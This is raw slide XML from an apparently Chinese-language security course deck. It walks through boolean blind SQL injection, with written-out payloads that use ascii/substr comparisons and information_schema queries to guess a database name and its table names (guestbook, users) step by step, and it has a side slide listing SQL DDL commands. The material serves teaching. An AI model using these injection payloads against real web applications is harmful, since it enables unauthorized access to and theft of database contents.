                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(),1,1))&lt;122 #</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，显示存在，说明数据库名的第一个字符的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值小于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>122</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z</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endParaRPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRP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(),1,1))&lt;109 #</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，显示存在，说明数据库名的第一个字符的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值小于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>109</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m</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endParaRPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRP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(),1,1))&lt;103 #</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，显示存在，说明数据库名的第一个字符的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值小于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>103</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g</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endParaRPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRP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(),1,1))&lt;100 #</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，显示不存在，说明数据库名的第一个字符的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值不小于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>100</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d</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a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRP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输入</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</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substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>databse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(),1,1))&gt;100 #</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，显示不存在，说明数据库名的第一个字符的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值不大于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>100</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>（小写字母</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>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值），所以数据库名的第一个字符的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>100</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，即小写字母</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>。</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="20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00530" y="1168053"/>
            <a:ext cx="11161240" cy="4246245"/>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第三步：猜解数据库中的表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"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首先猜解数据库中表的数量：</a:t>
            </a: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=database())=1 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示不存在</a:t>
            </a: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=database())=2 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示存在</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说明数据库中共有两个表。</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775" y="952029"/>
            <a:ext cx="11161240" cy="5170646"/>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接着挨个猜解表名：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"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 limit 0,1),1))=1 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示不存在</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 limit 0,1),1))=2 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示不存在</a:t>
            </a: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information_schema.tables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table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=database() limit 0,1),1))=9 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示存在</a:t>
            </a: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说明第一个表名长度为</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5100326" y="837929"/>
            <a:ext cx="2658100" cy="474140"/>
            <a:chOff x="5100326" y="837929"/>
            <a:chExt cx="2658100"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100326" y="837929"/>
              <a:ext cx="2658100"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DDL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的主要指令有</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 name="组合 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2255269" y="1816125"/>
            <a:ext cx="5503157" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="矩形 1"/>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 name="矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2607708" y="2063504"/>
              <a:ext cx="2359236"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CREATE DATABASE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5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4690994" y="1858364"/>
            <a:ext cx="3036883" cy="635596"/>
            <a:chOff x="4976668" y="1930372"/>
            <a:chExt cx="3036883" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="矩形 24"/>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710279" y="2063504"/>
              <a:ext cx="1569660"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创建新数据库</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="组合 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5312550" y="2752229"/>
            <a:ext cx="5503157" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="矩形 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="720075"/>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矩形 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2687184" y="2063504"/>
              <a:ext cx="2209772"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ALTER DATABASE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33" name="组合 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7748275" y="2794468"/>
            <a:ext cx="3036883" cy="635596"/>
            <a:chOff x="4976668" y="1930372"/>
            <a:chExt cx="3036883" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="矩形 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="635596"/>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825695" y="2063504"/>
              <a:ext cx="1338828"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修改数据库</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="组合 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2255269" y="3688333"/>
            <a:ext cx="5503157" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="矩形 36"/>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8" name="矩形 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2854024" y="2063504"/>
              <a:ext cx="1893339"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CREATE TABLE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39" name="组合 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4690994" y="3730572"/>
            <a:ext cx="3036883" cy="635596"/>
            <a:chOff x="4976668" y="1930372"/>
            <a:chExt cx="3036883" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="矩形 39"/>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941111" y="2063504"/>
              <a:ext cx="1107996"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创建新表</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="组合 41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5287508" y="4624437"/>
            <a:ext cx="5503157" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="矩形 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="720075"/>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4" name="矩形 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2894293" y="2063504"/>
              <a:ext cx="1743875" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ct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ALTER TABLE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45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7723233" y="4666676"/>
            <a:ext cx="3036883" cy="635596"/>
            <a:chOff x="4976668" y="1930372"/>
            <a:chExt cx="3036883" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="矩形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="635596"/>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248613" y="2063504"/>
              <a:ext cx="2492991"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变更（改变）数据库表</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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2255269" y="5574683"/>
            <a:ext cx="5503157" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="矩形 48"/>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0" name="矩形 49"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2945525" y="2063504"/>
              <a:ext cx="1641411" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ct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DROP TABLE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51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4690994" y="5616922"/>
            <a:ext cx="3036883" cy="635596"/>
            <a:chOff x="4976668" y="1930372"/>
            <a:chExt cx="3036883" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="矩形 51"/>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6022062" y="2063504"/>
              <a:ext cx="946092"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删除表 </a:t>
              </a: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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>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par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="2" presetClass="entr" presetSubtype="8"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par>
                          <p:cTn id="35" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="36" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="after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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>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par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="after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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>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10" presetClass="entr" presetSubtype="0" fill="hold"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775" y="445031"/>
            <a:ext cx="11161240" cy="506998"/>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接下来，继续用二分法来猜测表名。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2432931" y="5704557"/>
            <a:ext cx="8352928" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>说明第一个表的名字的第一个字符为小写字母</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>重复上述步骤，即可猜解出两个表名（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>guestbook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" kern="1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886645" y="1312069"/>
          <a:ext cx="11303370" cy="4219082"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11303370"/>
              </a:tblGrid>
              <a:tr h="4219082">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
